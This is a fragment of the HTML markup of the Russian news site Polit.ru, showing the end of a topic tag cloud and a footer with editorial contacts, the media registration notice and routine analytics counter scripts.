  <a href="/tag/hokkej/" class="weight8">хоккей</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/centrobank/" class="weight9">Центробанк</a>
  

  

  

  

  

  
  <a href="/tag/vzr/" class="weight0 force-hi macrotag">Цикл бесед &quot;Взрослые люди&quot;</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/chelyabinskaya-oblast/" class="weight6">Челябинская область</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/chechnya/" class="weight10 force-hi">Чечня</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/shahty/" class="weight4">шахты</a>
  

  
  <a href="/tag/switzerland/" class="weight6">Швейцария</a>
  

  
  <a href="/tag/sweden/" class="weight4">Швеция</a>
  

  

  

  
  <a href="/tag/schcool/" class="weight8">школа</a>
  

  

  

  

  

  
  <a href="/tag/shpionazh/" class="weight7">шпионаж</a>
  

  

  

  

  

  
  <a href="/tag/ebola/" class="weight8">Эбола</a>
  

  

  

  

  

  
  <a href="/tag/edvard-snouden/" class="weight8">Эдвард Сноуден</a>
  

  

  

  

  
  <a href="/tag/ecology/" class="weight8">экология</a>
  

  
  <a href="/tag/economy/" class="weight9">экономика</a>
  

  

  

  
  <a href="/tag/ekonomicheskij-krizis/" class="weight8">экономический кризис</a>
  

  

  

  

  

  
  <a href="/tag/extremismus/" class="weight7">экстремизм</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/south_korea/" class="weight8">Южная Корея</a>
  

  

  

  

  

  
  <a href="/tag/yukos/" class="weight10">ЮКОС</a>
  

  
  <a href="/tag/yuliya-timoshenko/" class="weight5">Юлия Тимошенко</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/nuclear_weapon/" class="weight7">ядерное оружие</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/japan/" class="weight9">Япония</a>
  

  

  

  

  

</div>



  
</div>

      
    
  
  </div>




    <!--BEGIN #footer-->

    <!--BEGIN #footer-->
    <div style="margin: 15px 0 25px;">
      <!--LiveInternet counter--><script type="text/JavaScript"><!--
        document.write('<a href="http://www.liveinternet.ru/click" target=liveinternet rel="nofollow"><img src="http://counter.yadro.ru/hit?t45.6;r'+
          escape(document.referrer)+((typeof(screen)=='undefined')?'':';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
          screen.colorDepth:screen.pixelDepth))+';'+Math.random()+'" border=0 width=31 height=31 alt="liveinternet.ru"></a>')
      //--></script><!--/LiveInternet-->
    </div>
    <div class="info-container stop">
      <div class="first">
        <h4 class="subject block-subject"><a href="/rubric/redakciya/" rel="nofollow" style="color:#FFF;">Редакция</a></h4>
        Электронная почта: <a href="mailto:politru.edit1@gmail.com" rel="nofollow">politru.edit1@gmail.com</a>
        <br/>
        Адрес: 129343, Москва, проезд Серебрякова, д.2, корп.1, 9 этаж.
        <br/>
        Телефоны: +7 495 980 1893, +7 495 980 1894.
        <br/>
        <a href="/static/price.xlsx">Стоимость услуг Полит.ру</a>
                    <!-- Yandex.Metrika counter -->
                    <div style="display:none;"><script type="text/javascript">
                    (function(w, c) {
                        (w[c] = w[c] || []).push(function() {
                            try {
                                w.yaCounter5421865 = new Ya.Metrika(5421865);
                                 yaCounter5421865.clickmap(true);
                                 yaCounter5421865.trackLinks(true);

                            } catch(e) { }
                        });
                    })(window, 'yandex_metrika_callbacks');
                    </script></div>
                    <script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript"
                    defer="defer"></script>
                    <noscript><div><img src="//mc.yandex.ru/watch/5421865"
                    style="position:absolute; left:-9999px;" alt="" /></div></noscript>
                    <!-- /Yandex.Metrika counter -->
      </div>
      <div class="agelimit"></div>
      <div class="second">
        Свидетельство о регистрации средства массовой информации<br/>
        Эл. № 77-8425 от 1 декабря 2003г. Выдано министерством<br/>
        Российской Федерации по делам печати, телерадиовещания и<br/>
        средств массовой информации.
        Выходит с 21 февраля 1998 года.<br/>
        При любом использовании материалов веб-сайта ссылка на Полит.ру обязательна.<br/>
        При перепечатке в Интернете обязательна гиперссылка <a href="/">polit.ru</a>.<br/>
        Все права защищены и охраняются законом.<br/>
        © Полит.ру, 1998–2014<a rel="nofollow" href="/purge/news/2016/12/23/pay/" style="text-decoration: none; color: #FFFFFF;">.</a>
      </div>
    </div>
    <div class="black-bottom stop">

    </div>
  </div>


	


    <!--END #footer-->
  <script type="text/javascript">
    (window.Image ? (new Image()) : document.createElement('img')).src = location.protocol + '//vk.com/rtrg?r=DWczk9hWeAvkw4Spq8D4hz2w1MfxfpmDx/ZgQHRFD0o641mnFqVMc*QV8joivbZSsPA/URYGFFIRCucM8ibEezf2AYNfSVMgaMW2N1cgx/flht*xh7XqKekOJqgAXuZvzaemjUVvGkCuk5jEUkCi*4*H82g4/Y64rYb2Itn*pT0-';
    load_banners();
  </script>
</body>
</html>

